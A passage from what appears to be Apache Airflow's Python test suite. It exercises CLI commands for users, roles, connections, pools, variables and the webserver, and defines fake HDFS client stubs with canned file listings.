EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['dags', 'list', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator', ]))
args = self.parser.parse_args(['dags', 'list_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', 'create', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users_create(args)
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.users_list(self.parser.parse_args(['users', 'list']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', 'add_role', '--username', 'test4', '--role', 'Op'
])
cli.users_manage_role(args, remove=False)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
])
cli.users_manage_role(args, remove=True)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.roles_list(self.parser.parse_args(['roles', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['tasks', 'list', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'tasks', 'list', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['dags', 'list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['dags', 'list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['db', 'init']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_list(self.parser.parse_args(['connections', 'list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', 'list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new2',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_uri
with self.assertRaises(SystemExit) as exc:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new']))
self.assertEqual(
exc.exception.code,
"The following args are required to add a connection: ['conn_uri or conn_type']"
)
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new1']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new2']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new3']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new4']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new5']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'tasks', 'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'tasks', 'state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dags', 'state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'dags', 'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'dags', 'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'example_subdag_operator',
'--yes']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'subdag', '-dx', '--yes']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'foobar', '-dx', '--yes']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'dags', 'delete',
'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
# Test to check that the DAG should be deleted even if
# the file containing it is not deleted
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
try:
cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool import pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool export pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"bar"}']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'foo']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'baz', '-d', 'bar']))
cli.variables_list(self.parser.parse_args([
'variables', 'list']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'bar']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', DEV_NULL]))
cli.variables_export(self.parser.parse_args([
'variables', 'export', DEV_NULL]))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'original']))
# First export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'updated']))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"oops"}']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'foo']))
# First import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'list', '["oops"]']))
# Set str
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'str', 'hello string']))
# Set int
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'int', '42']))
# Set float
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'float', '42.0']))
# Set true
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'true', 'true']))
# Set false
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'false', 'false']))
# Set none
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'null', 'null']))
# Export and then import
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables3.json']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
